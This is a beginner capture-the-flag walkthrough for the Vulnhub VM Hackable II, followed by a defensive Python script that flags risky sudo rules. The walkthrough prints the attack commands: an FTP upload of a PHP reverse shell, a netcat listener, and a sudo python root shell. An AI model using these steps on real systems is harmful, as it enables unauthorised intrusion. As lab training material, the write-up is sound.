Hackable II Walkthrough – Vulnhub – Writeup
Hackable II is an easy machine that everyone can root. So, I am doing this walkthrough in case you are stuck somehow. Also, I am running this machine on VirtualBox.
Link to the machine: https://www.vulnhub.com/entry/hackable-ii,711/
Identify the target
Firstly, I had to get the IP address of the target machine.
sudo netdiscover -i eth0 -r 10.0.2.0/24

My IP address is 10.0.2.15 whereas that of the target is 10.0.2.40.
Scan open ports
Now that I know the IP address of the target machine, I have to scan open ports so that I would know the exposed services.
nmap -T4 -sC -sV -p- --min-rate=1000 -oN nmap.log 10.0.2.40

As we can see above, we have an FTP server that has allowed anonymous access. Likewise, nmap also displays the filename. So, I am going to look at the file first.
ftp 10.0.2.40

cat CALL.html

It doesn’t say anything right now.
Enumerate web server
Since the FTP server didn’t hint at anything on its own, I did directory enumeration.
gobuster dir -u http://10.0.2.40/ -x txt,php,html --wordlist /usr/share/seclists/Discovery/Web-Content/big.txt -o gobuster.log

Clearly, there is a directory that I could take a look into.

So, it looks like the directory ‘files’ is served by the FTP server. Thus, if I could place a webshell on the FTP server, I could execute it using the web browser.
Inject a reverse shell
I would use a web shell from pentestmonkey. Since I am on Kali Linux, I have this in the directory ‘/usr/share/webshells/php’. Otherwise, you can take a look at the following link.
https://pentestmonkey.net/tools/web-shells/php-reverse-shell
Now, I changed the IP address and port in the shell. Then, I listened on the port.

nc -nlvp 4444

Once again, I opened the ftp client and tried to put the shell in there.
ftp 10.0.2.40
put shell.php

As we can see, the FTP server had write access. So, I could write to the directory which is being served by the FTP server. As I know the directory, I directly opened the shell from my browser.


Like this, I got the shell. I did a few tweaks to make it smart.
SHELL=/bin/bash script -q /dev/null
export TERM=xterm
# do Ctrl + Z
stty raw -echo;fg
reset
stty cols 143 rows 43
Get user’s access
My next step would be getting access to one of the users of the machine. So, I looked up the users first.

There is a user named shrek. Hence, either I need to get the credentials of shrek or get a way to enter his shell without a password.
So, I found a file in the directory /home.
cd /home
ls -al
cat important.txt

So, I looked at the content of the script file.
ls -l /.runme.sh
cat /.runme.sh

The author had tried to troll us but I escaped his trolling. However, at the bottom of the file, there is something that interested me.

It is an MD5 hash of something. Thus, I went to crackstation to crack it.

The hash was of the word ‘onion’. This word was also present in the file CALL.html.

Hence, I gave it a shot as the password of the user shrek and that worked as well.
su shrek

Finally, I got the user’s flag.

Get root shell
We have come to the last bit of the challenge now. Basically, in this stage, I first check SUID binaries, sudo permissions and binaries with capabilities.
sudo -l

When I checked the sudo permissions, I saw that the user shrek doesn’t require a password to execute commands as root. Now, we can get a shell of the root user using the python3.5 binary.
Reference: https://gtfobins.github.io/gtfobins/python/#shell
sudo python3.5 -c 'import os; os.system("/bin/bash")'

Lastly, I got the root flag.
cd /root
ls -al
cat root.txt
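
The sudo rule used above is the kind of entry an administrator can catch during a review. As an added example (not part of the original walkthrough), this Python script parses the output of 'sudo -l' and flags rules that let a user run an interpreter, or any command, as root. The sample output, host name, paths and the interpreter list are constructed for illustration.

```python
import os
import re

# Constructed sample of `sudo -l` output (host name and paths are made up).
SAMPLE = """\
Matching Defaults entries for shrek on ubuntu:
    env_reset, mail_badpass

User shrek may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/python3.5
    (root) /usr/bin/systemctl status nginx
    (www-data) NOPASSWD: /usr/bin/perl
    (ALL : ALL) ALL
"""

# Short, non-exhaustive list of interpreters that can spawn a shell (assumption
# of this example; GTFOBins keeps the full catalogue).
INTERPRETERS = {"python", "perl", "ruby", "php", "lua", "node", "bash", "sh", "dash", "zsh"}

# Rule line: "(runas[: group]) [TAG: ...] command[, command ...]"
RULE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")


def audit_sudo_l(output):
    """Return (command, nopasswd, reason) for every rule that hands out root."""
    findings = []
    for line in output.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header, Defaults or blank line
        runas, tags, cmds = m.groups()
        users = {u.strip() for u in runas.split(":")[0].split(",")}
        if not users & {"root", "ALL"}:
            continue  # rule does not run as root
        nopasswd = "NOPASSWD:" in tags
        for cmd in (c.strip() for c in cmds.split(",") if c.strip()):
            # "python3.5" -> "python": drop the trailing version number
            name = re.sub(r"[\d.]+$", "", os.path.basename(cmd.split()[0]))
            if cmd == "ALL":
                findings.append((cmd, nopasswd, "any command as root"))
            elif name in INTERPRETERS:
                findings.append((cmd, nopasswd, "interpreter runs arbitrary code as root"))
    return findings


if __name__ == "__main__":
    for cmd, nopasswd, reason in audit_sudo_l(SAMPLE):
        print(f"{'NOPASSWD' if nopasswd else 'password'}: {cmd} -> {reason}")
```

Rules flagged with NOPASSWD deserve attention first, since anyone who obtains that user's session gets root without knowing the password.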

Conclusion
Like I said at the start of the walkthrough, this is a very easy machine. Hence, I recommend it to absolute beginners in CTF challenges. You guys can also recommend this post to someone who wants to start with very basic challenges.